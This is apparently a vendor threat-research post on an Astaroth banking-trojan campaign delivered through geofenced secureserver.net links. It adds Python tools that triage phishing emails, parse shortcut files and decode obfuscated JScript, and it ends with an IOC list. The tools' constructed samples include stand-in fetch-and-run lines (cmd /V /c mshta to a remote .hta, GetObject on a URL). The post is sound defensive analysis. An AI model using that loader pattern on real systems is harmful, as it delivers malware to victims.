
Astaroth Trojan Attacks Brazil and Mexico via Secureserver.net


Note from Lionel: Late last week, our X-Labs researchers saw increased activity regarding the Astaroth banking trojan delivered via secureserver[.]net URLs. It's a platform that Prashant has been tracking since his first secureserver[.]net post back in July.

During the process of wrapping up Prashant's analysis, we noticed that researchers at Trend Micro had already published their own Astaroth research. In the spirit of sharing more information, we decided to proceed with publishing this post. 

Since my last Unseen Dangers post about malware delivered by secureserver[.]net-based URLs, the attacks have continued, but this time with a different technique. Here is the attack chain:

EML -> URL (evasive) -> ZIP -> LNK -> MSHTA -> obfuscated JS -> C2

The campaign has mostly affected Latin America: the recipient domains we observed are predominantly in Brazil and Mexico. The most affected industries are Business and Economy, Travel, Shopping, and Government agencies.

Fig. 1 -Astaroth targets

Fig. 2 - Astaroth email

The email contains a secureserver[.]net link that hosts the malicious file; browsing to the URL downloads an archive.

The secureserver[.]net link is evasive and only serves its payload to visitors in the Brazil region, so an analyst fetching it from elsewhere may get nothing back. The HTML part of the email declares the language as "pt-BR", a further clue that the URL is meant to work only for recipients in the region.

Fig. 3 - HTML in Astaroth email
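The triage described above, as an added example that is not part of the original post: the Python below reads an .eml with the standard library, pulls the lang attribute from the HTML part and every URL from both parts, defangs them for reporting, and notes which ones are hosted under secureserver.net. The message is constructed for this example (the hostname follows the page's delivery pattern, with a documentation-range IP in place of the real one); no real campaign email is embedded.

```python
import re
from email import message_from_bytes, policy
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s<>\"']+")
# Picks up lang="pt-BR" (a BCP 47 tag) on the <html> element.
LANG_RE = re.compile(r"<html\b[^>]*\blang=[\"']?([A-Za-z]{2,3}(?:-[A-Za-z0-9]{2,8})*)", re.I)


def defang(url: str) -> str:
    """http(s):// -> hxxp(s):// and the last dot of the host -> [.]; path is kept intact."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + "[.]".join(host.rsplit(".", 1)) + slash + path


def triage_eml(raw: bytes) -> dict:
    """Return the lure's language hint and its URLs (defanged) from a raw .eml."""
    msg = message_from_bytes(raw, policy=policy.default)
    texts = []
    for kind in ("html", "plain"):
        part = msg.get_body(preferencelist=(kind,))
        texts.append(part.get_content() if part is not None else "")
    html_text, plain_text = texts
    lang = LANG_RE.search(html_text)
    # dict.fromkeys keeps first-seen order while removing duplicates across parts.
    urls = list(dict.fromkeys(URL_RE.findall(html_text) + URL_RE.findall(plain_text)))
    on_secureserver = [u for u in urls if (urlsplit(u).hostname or "").endswith(".secureserver.net")]
    return {
        "subject": msg["subject"],
        "html_lang": lang.group(1) if lang else None,
        "urls": [defang(u) for u in urls],
        "secureserver_urls": [defang(u) for u in on_secureserver],
    }


# Constructed sample message (not the campaign's email). 203.0.113.10 is a
# documentation-range address standing in for the real host prefix.
SAMPLE_EML = b"""From: "Cobranca" <cobranca@example.invalid>
To: financeiro@example.com.br
Subject: Fatura em atraso
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Sua fatura esta disponivel em https://203.0.113.10.host.secureserver.net/download
--b1
Content-Type: text/html; charset="utf-8"

<html lang="pt-BR"><body><a href="https://203.0.113.10.host.secureserver.net/download">Baixar fatura</a></body></html>
--b1--
"""

if __name__ == "__main__":
    for key, value in triage_eml(SAMPLE_EML).items():
        print(f"{key}: {value}")
```

Because the link is geofenced, the URL itself is the artifact worth keeping even when a fetch from outside Brazil returns nothing; the defanged form is what goes into the IOC list.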

The archive contains a .lnk file whose target launches cmd.exe, which in turn runs mshta.exe; MSHTA then carries out the remaining activity and runs the JavaScript payload. See Fig. 4 below:

Fig. 4 - LNK file and its content

  • cmd.exe – the command-line interpreter launched by the shortcut's target.
  • /V – enables delayed environment-variable expansion (/V:ON), so !variables! are expanded when each command executes rather than when the line is parsed; it is a common way to assemble a command line that never appears in one piece to a static scanner.
  • /c – runs the command given by the following string and then exits.
  • mshta.exe – a legitimate Microsoft program that executes HTML Applications (HTA); it will run script from a seemingly benign HTML file or URL, which is why it is a frequently abused living-off-the-land binary.
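As an added example (not part of the original post, and not code from the campaign), the following Python parses the StringData of a .lnk file directly from the MS-SHLLINK layout (header, optional IDList and LinkInfo, then the name, relative path, working directory, arguments and icon strings) and flags the cmd.exe /V /c mshta pattern described above. The shortcut it inspects is built inline and is constructed for this example; the URL example.invalid and the relative path are assumptions, not campaign values.

```python
import re
import struct

# MS-SHLLINK: fixed header size, the Shell Link CLSID, and the LinkFlags bits used here.
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

# StringData sections appear in this fixed order, each only when its flag is set.
STRING_DATA = [
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk file; ExtraData blocks are not parsed."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LINK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (u16) does not count itself
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (u32) includes itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for flag, name in STRING_DATA:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[name] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return fields


def lnk_indicators(fields: dict) -> list:
    """Heuristics for the cmd.exe /V /c mshta chain on the shortcut's command line."""
    cmdline = " ".join(fields.get(k, "") for k in ("relative_path", "arguments")).lower()
    hits = []
    if "cmd.exe" in cmdline or cmdline.startswith("cmd"):
        hits.append("shortcut launches cmd.exe")
    if re.search(r"(?<!\S)/v(?::on)?(?!\S)", cmdline):
        hits.append("cmd.exe delayed expansion (/V) requested")
    if "mshta" in cmdline:
        hits.append("mshta.exe invoked from shortcut")
    if re.search(r"(?:https?|hxxps?)://", cmdline):
        hits.append("URL on shortcut command line")
    return hits


def build_sample_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed minimal .lnk (not a campaign sample): header, empty IDList, two strings."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (HEADER_SIZE - len(header))     # timestamps, size, icon etc. zeroed
    id_list = struct.pack("<HH", 2, 0)                   # IDListSize=2, then TerminalID=0
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (relative_path, arguments))
    return header + id_list + strings


SAMPLE_LNK = build_sample_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    "/V /c mshta hxxps://example.invalid/a.hta",   # assumed command line, not the real one
)

if __name__ == "__main__":
    fields = parse_lnk(SAMPLE_LNK)
    print(fields)
    print(lnk_indicators(fields))
```

On a real sample the target path usually lives in the IDList shell items rather than RelativePath, and some droppers hide the command in an ExtraData block; this parser skips both, so treat an empty result as "look deeper", not "clean".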

On expanding the code, we get an obfuscated script that mixes hexadecimal and octal escape sequences.

Fig. 5 - Activity series in LNK file

Deobfuscating the code resolves it to a URL and some additional content:

Fig. 6 - Deobfuscated code

Decoding the code:

The code has two main components:

  1. A variable defined as an array of two strings: seven random characters and a URL.
  2. A call to the GetObject method.

How the code works:

  • GetObject is used to fetch and execute the content at the URL; the seven random characters (VDZLQHG in this case) serve as the method name.
  • If the connection succeeds, the script connects to the C2 and sends sensitive system data to it.
  • If not, the failure is caught silently and the script redirects to a clean site, usually a social network such as Facebook, Twitter or LinkedIn.
  • When the connection succeeds, the C2 infrastructure it reaches is that of the banking trojan known as Astaroth.
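The hex/octal deobfuscation and the array-plus-GetObject structure described in the two passages above, as an added Python example that is not the campaign's code: it decodes each JScript string literal separately (so a decoded quote cannot resplit the script), then reports the URL, the short random name and whether the script calls GetObject and swallows errors. The script it runs on is a constructed stand-in: the URL is example.invalid and only the seven-character name comes from the write-up. \uHHHH escapes are handled as well, which goes beyond the hex and octal forms the post mentions.

```python
import re

# Escapes: \xHH, \uHHHH and legacy octal \0-\377 (ES grammar: a leading 0-3 may take
# two more digits, a leading 4-7 only one), so "\1234" decodes as "\123" + "4".
ESCAPE_RE = re.compile(r"\\(?:x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4})|([0-3][0-7]{0,2}|[4-7][0-7]?))")
# A JS string literal; backslash pairs are kept together so an escaped quote does not end it.
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"' + r"|'((?:[^'\\]|\\.)*)'")


def decode_js_escapes(s: str) -> str:
    """Resolve hex, unicode and octal escapes the way a JScript engine would."""
    def repl(m):
        hx, uni, octal = m.groups()
        if hx:
            return chr(int(hx, 16))
        if uni:
            return chr(int(uni, 16))
        return chr(int(octal, 8))
    return ESCAPE_RE.sub(repl, s)


def extract_strings(js: str) -> list:
    """Decode every string literal on its own, in source order."""
    return [decode_js_escapes(dq or sq) for dq, sq in STRING_RE.findall(js)]


def analyze_dropper(js: str) -> dict:
    strings = extract_strings(js)
    return {
        "strings": strings,
        "urls": [s for s in strings if re.match(r"https?://", s, re.I)],
        # the array pairs a short alphabetic name with the URL; surface it too
        "method_names": [s for s in strings if re.fullmatch(r"[A-Za-z]{5,10}", s)],
        "uses_getobject": bool(re.search(r"\bGetObject\s*\(", js)),
        "swallows_errors": bool(re.search(r"catch\s*\(\s*\w*\s*\)\s*\{\s*\}", js)),
    }


# Constructed stand-in for the obfuscated script (not the campaign's code). The first
# element is the name quoted in the write-up; the URL is example.invalid, an assumption.
OBFUSCATED = (
    r'var a=["\x56\x44\x5a\x4c\x51\x48\x47",'
    r'"\150\164\164\160\163\072\057\057\x65\x78\x61\x6d\x70\x6c\x65\056'
    r'\x69\x6e\x76\x61\x6c\x69\x64\057\x3f\x32\x2f"];'
    r'try{GetObject(a[1])}catch(e){}'
)

if __name__ == "__main__":
    print(analyze_dropper(OBFUSCATED))
```

Decoding literal by literal also keeps a deliberately planted quote or bracket inside a string from breaking a naive whole-file decode, which is a trick this style of dropper uses to frustrate one-shot unescaping.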

The hostnames look randomly generated and are presumed malicious, suited to phishing or other malicious activity. Generating domains this way is known as a Domain Generation Algorithm (DGA); many malware authors use one to produce large numbers of domains so that blocking a handful has little effect. All three URLs in the IOC list also sit on inexpensive newer gTLDs (.sbs, .quest, .associates). While analysing the campaign, no critical payload has been observed so far.

Fig. 7 below shows the distribution trend of this malware over the last four months:

Protection statement

Forcepoint customers are protected against this threat at the following stages of attack:

  • Stage 2 (Lure) – delivered via a weaponized URL embedded in an email. The emails and the embedded URLs are blocked by email analytics and web analytics respectively, and by Real Time Security Analytics.
  • Stage 3 (Redirect) – identified redirections used to download multiple payloads are categorized and blocked under the security classification.
  • Stage 5 (Dropper File) – the dropper files are added to the Forcepoint malicious database and blocked.
  • Stage 6 (Call Home) – the command and control (C&C) servers the malware contacts to exfiltrate sensitive user data are categorized and blocked under the security classification.

 

IOC list

URL delivery pattern 

  • hxxps://222.183.62[.]50.host.secureserver[.]net

ZIP (SHA-1)

  • 1368b8d0a6e4c511e17080032b183133e920bc2f
  • e92fcd723d12b6e9533e8cbb9bab374037184fe1
  • efffe10b78e1eab853dd6e91bbec52b24e331af2 

LNK (SHA-1)

  • 4c691442ae0af56d8559475f73a3482a38394626
  • a835e5d99b11339056bc36cbb41d950525a5aaa5
  • 7957de4e33259045d7da94905203ad7f1432141c 

URL 

  • hxxps://tiasr[.]olafdisney.sbs/?5/
  • hxxps://screranvel[.]safezipdirect.associates/?2/
  • hxxps://planbenpunwel2[.]smartconsultoria.quest/?2/ 


    Prashant Kumar

    Prashant serves as a Security Researcher for the X-Labs Threat Research Content. He spends his time researching web and email-based cyberattacks with a particular focus on URL research, email security and analyzing malware campaigns.
